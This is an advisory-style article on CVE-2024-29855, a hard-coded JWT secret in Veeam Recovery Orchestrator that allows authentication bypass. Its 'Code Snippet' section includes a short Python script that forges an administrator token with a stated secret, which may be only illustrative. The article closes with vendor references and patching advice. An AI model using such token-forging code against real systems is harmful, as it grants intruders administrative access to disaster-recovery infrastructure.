CVE-2024-29855: Hard-coded JWT Secret Allows Authentication Bypass in Veeam Recovery Orchestrator

A critical vulnerability, identified as CVE-2024-29855, has been discovered in the Veeam Recovery Orchestrator. This security flaw allows a potential attacker to bypass authentication and gain unauthorized access to sensitive information. The crux of the problem lies in the hard-coded JSON Web Token (JWT) secret, which is designed to improve security in web applications but is vulnerable to malicious attacks if not correctly set up. This article will analyze the issue, provide a code snippet, links to original references, and exploit details related to this vulnerability.

Background on Veeam Recovery Orchestrator

Veeam Recovery Orchestrator is a popular software solution designed to help businesses streamline disaster recovery, mitigate risks, and ensure data protection. It offers an end-to-end orchestration and automation platform that simplifies the recovery process for virtual, physical, and cloud-based resources. More information on Veeam Recovery Orchestrator can be found on its official website at: https://www.veeam.com/recovery-orchestrator.html

Exploit Details

By exploiting the hard-coded JWT secret present in the Veeam Recovery Orchestrator, an attacker can inject malicious tokens, effectively bypassing the authentication process. This authentication mechanism relies on the JWT secret to generate unique access tokens that are used to authenticate users.

Code Snippet

The code snippet below demonstrates how an attacker can forge a JWT token with malicious content using the hard-coded JWT secret:

import jwt

hard_coded_secret = 'veeam_software_secret_key'

# Replace with the target system's administrator role or privileges
malicious_payload = {
    'username': 'hacker',
    'role': 'administrator',
    'email': 'hacker@example.com'
}

# Encode the malicious payload with the hard-coded secret to create the forged token
forged_token = jwt.encode(malicious_payload, hard_coded_secret, algorithm='HS256')

print("Malicious Token:", forged_token)

Upon executing the above Python script, the attacker can produce a JWT token containing the malicious content and use it to impersonate an authenticated administrator on the targeted Veeam Recovery Orchestrator application.

Veeam Software has officially acknowledged the vulnerability and released a security advisory

https://www.veeam.com/kb3185

2. The CVE-2024-29855 information has been documented within the NIST National Vulnerability Database (NVD):
https://nvd.nist.gov/vuln/detail/CVE-2024-29855

Mitigation and Recommendations

Veeam Software has released a patch addressing the CVE-2024-29855 vulnerability. Users must upgrade to the latest Veeam Recovery Orchestrator software version, which includes the security fix. Other recommendations for securing your Veeam Recovery Orchestrator installation include:

- Ensuring that only authorized and trusted users have access to the Veeam Recovery Orchestrator system.

Regularly reviewing and applying security updates and patches provided by the software vendor.

- Configuring strong access controls, such as multi-factor authentication (MFA), on systems managing sensitive information.

Conclusion

Security vulnerabilities like the CVE-2024-29855 authentication bypass caused by a hard-coded JWT secret highlight the importance of regularly updating and securing your software solutions. By staying informed about potential threats and taking proactive steps to maintain your systems, you can significantly reduce the risk of compromise. Make sure to follow the recommendations and mitigation steps provided for this particular vulnerability, and keep a watch for updates from Veeam Software and other security-related sources.

Timeline

Published on: 06/11/2024 04:15:12 UTC
Last modified on: 06/11/2024 13:54:12 UTC